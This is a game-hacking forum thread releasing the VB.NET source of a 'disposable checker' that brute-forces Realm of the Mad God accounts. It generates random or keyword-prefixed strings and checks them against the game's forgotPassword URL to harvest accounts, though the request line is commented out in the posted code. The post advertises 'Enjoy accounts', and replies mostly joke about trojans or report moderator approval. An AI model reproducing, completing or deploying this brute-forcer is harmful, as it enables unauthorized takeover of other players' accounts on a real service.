Yet Another Disposable Checker X ~ AUTOMATIC BRUTEFORCING ~ NO BATCH
I told you, I hide my 7 trojans, 2 fork bombs, 18 phisers, 96 sol grabbers, 3 keyloggers, 22 STDS, and a line of code that prevents you from closing your computer so it overheats and explodes and you die. I also gave it a penis so it can transmit the stds to you after destroying your computer.
@New your new avatar looks loads better.
Since the last one was pretty much un-decryptable..
Here is the unencrypted version.
Virus scan 1
Virus scan 2
Source:
Proof is in the previous attempt to release it.
Just to clear my name because some people thought my last update was a virus or a sol stealer or whatever because it was encrypted.
Virus scan 1
Virus scan 2
Source:
Code:
Imports System.Text
Public Class Form1
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim attempts As Integer
attempts = 0
If RadioButton1.Checked = True Then
Dim validchars As String = TextBox4.Text
Dim sb As New StringBuilder()
Dim rand As New Random()
For i As Integer = 1 To TextBox5.Text
Dim idx As Integer = rand.Next(0, validchars.Length)
Dim randomChar As Char = validchars(idx)
sb.Append(randomChar)
Next i
Dim randomString = sb.ToString()
TextBox2.Text = randomString
End If
If RadioButton2.Checked = True Then
Dim validchars As String = TextBox4.Text
Dim sb As New StringBuilder()
Dim rand As New Random()
For i As Integer = 1 To TextBox7.Text
Dim idx As Integer = rand.Next(0, validchars.Length)
Dim randomChar As Char = validchars(idx)
sb.Append(randomChar)
Next i
Dim randomString = sb.ToString()
TextBox2.Text = TextBox6.Text + randomString
End If
If RadioButton3.Checked = True Then
Dim amount As Integer
amount = CInt(Math.Ceiling(Rnd() * most.text)) + 1
Dim validchars As String = TextBox4.Text
Dim sb As New StringBuilder()
Dim rand As New Random()
For i As Integer = 1 To amount
Dim idx As Integer = rand.Next(0, validchars.Length)
Dim randomChar As Char = validchars(idx)
sb.Append(randomChar)
Next i
Dim randomString = sb.ToString()
TextBox2.Text = randomString
End If
'Dim webpageData As String
Using webClient As New System.Net.WebClient()
'webpageData = webClient.DownloadString("http://realmofthemadgod.appspot.com/account/forgotPassword?guid=" + TextBox2.Text + TextBox14.Text)
End Using
'Dim containsWord = webpageData.Contains("Success")
'If containsWord = True Then
'ListBox1.Items.Add(TextBox2.Text + TextBox14.Text)
'End If
If CheckBox1.Checked = True Then
If RadioButton1.Checked = True Then
TextBox1.Text = Val(TextBox1.Text) + 1
End If
End If
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Timer2.Interval = TextBox3.Text
End Sub
Private Sub TextBox4_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox4.TextChanged
End Sub
Private Sub TextBox5_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox5.TextChanged
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim onl As Boolean
If Timer2.Enabled = True Then
onl = True
Else
onl = False
End If
If onl = True Then
Timer2.Stop()
Button1.Text = "Unpause"
End If
If onl = False Then
Timer2.Start()
Button1.Text = "Pause"
End If
End Sub
Private Sub RadioButton2_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles RadioButton2.CheckedChanged
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
If RadioButton2.Checked = False Then
TextBox6.Enabled = False
TextBox7.Enabled = False
End If
If RadioButton1.Checked = False Then
TextBox5.Enabled = False
End If
If RadioButton3.Checked = False Then
most.Enabled = False
End If
If RadioButton3.Checked = True Then
most.Enabled = True
End If
If RadioButton1.Checked = True Then
TextBox5.Enabled = True
End If
If RadioButton2.Checked = True Then
TextBox6.Enabled = True
TextBox7.Enabled = True
End If
End Sub
End Class
Just to clear my name because some people thought my last update was a virus or a sol stealer or whatever because it was encrypted.
File approved, couldn't find the strings, turned out it was just because you had added something that made it go into the text box, as with all of these your going to get a ton of false positives due to the nature of the file, sorry we had to go through all that drama. Report any problems to me. Previous post deleted and file edited in main post.
Yup I was thinking why should I make a Dim String when I can just make it randomize the text in the textbox, and pick the data from the textbox.
Didn't know it would give me false positives tho thats weird. It might think that since it fetches data from a textbox it might be a phisher or whatever, that's an assumption at least.
Didn't know it would give me false positives tho thats weird. It might think that since it fetches data from a textbox it might be a phisher or whatever, that's an assumption at least.
Yet Another Disposable Checker X ~ AUTOMATIC BRUTEFORCING ~ NO BATCH
Description
It's a bruteforcer for realm.
ChangeLog
Cons
Not as fast as verssss or ruseys bruteforcers.
If your girlfriend saw that running on your computer she would think you are an ugly nerd.
And it only has one thread so that's that.
Why should I pick this shit then?
It has some *unique* features.
How many trojans did you put in this file?
I put in this file 11 trojans, and 6 fork bombs.
Jokes aside, the false alarms are apparently because I was too lazy to create strings, and decided to make the program fetch its data from a textbox.
How does this shit look like?

It's unencrypted so if anyone wants to review the code go ahead @ReySharlLel
It's a bruteforcer for realm.
ChangeLog
Code:
Automatic bruteforcing. Background bruteforcing. No RAM / CPU devouring. No windows open anymore. Programatically searching for successes and listing them out. A new unique feature ~ Select a keyword ~ Select random amount of letters that follow it ~ Enjoy accounts Another unique feature (kindof) ~ Random amount of letters ~ You select the maximum. Customizable charset! Customizable domain! Customizable cooldown between checks. It even has a pause button!
Not as fast as verssss or ruseys bruteforcers.
If your girlfriend saw that running on your computer she would think you are an ugly nerd.
And it only has one thread so that's that.
Why should I pick this shit then?
It has some *unique* features.
How many trojans did you put in this file?
I put in this file 11 trojans, and 6 fork bombs.
Jokes aside, the false alarms are apparently because I was too lazy to create strings, and decided to make the program fetch its data from a textbox.
How does this shit look like?

It's unencrypted so if anyone wants to review the code go ahead @ReySharlLel
Thanks for keeping it unencrypted, really easy to read, again edited and approved, there was a bug in the file.
I can't execute it. I open the task manager and the program appears there... like running, but I can't close it.
Similar Threads
Minecraft HelpGetting into account hacking: no success yet?
6 Combat Arms Selling / Trading / Buyingyet another rs account for sale for a CA account! 2 CrossFire Hacks & CheatsYet another pub hack question...
0 WarRock - International HacksYet Another Hack
3 Trade Accounts/Keys/ItemsYet Another Account For Retail :D 13

